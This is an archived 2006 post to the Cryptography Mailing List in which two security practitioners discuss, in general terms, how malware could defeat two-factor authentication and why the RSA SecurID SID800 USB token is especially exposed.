RSA SecurID SID800 Token vulnerable by design

Hadmut Danisch hadmut at danisch.de
Fri Sep 8 14:22:55 EDT 2006


Hi Lance,

On Fri, Sep 08, 2006 at 10:26:45AM -0700, Lance James wrote:
> 
> Another problem from what I see with Malware that steals data is the
> formgrabbing and "on event" logging of data. Malware can detect if
> SecureID is being used based on targeted events, example: Say HSBC
> (Hypothetical example, not targeting HSBC) has two-factor logins in
> place, the problem with this is that it is vulnerable to session riding
> and trojan-in-the-middle attacks anyway, because the minute the user
> logs in, the malware could launder money out (unless transaction auth is
> in place, which in most cases it's not), or they could pharm the user
> with a fake website that resolves as HSBC but they go in within the time
> frame of that token being valid and have access. Either way, however you
> cut it, SecureID/Two-Factor User auth is not protected against malware,
> period.


Partly agreed. These kinds of attacks I usually teach in my
workshops. 

However, in all of these cases the attacker has to be online in the
moment you are logging in and you experience any failure, e.g. can't
login or something like that. 

But with the SID800 malware could silently sit in the background and
pass token codes to the attacker even if you do not login at this
moment. E.g. it could wait until you have logged in (or out) and grap
the next token code.

Furthermore, the attack you described presumes that the attacker knows
where you want to login. But when you could use the current token code
as an indicator for searching login data in the input stream, then you
can find new places to login, e.g. your company VPN access point.

While the attack you describe is more important for banking, the USB
attack is more against company logins.

regards
Hadmut




---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo at metzdowd.com



More information about the cryptography mailing list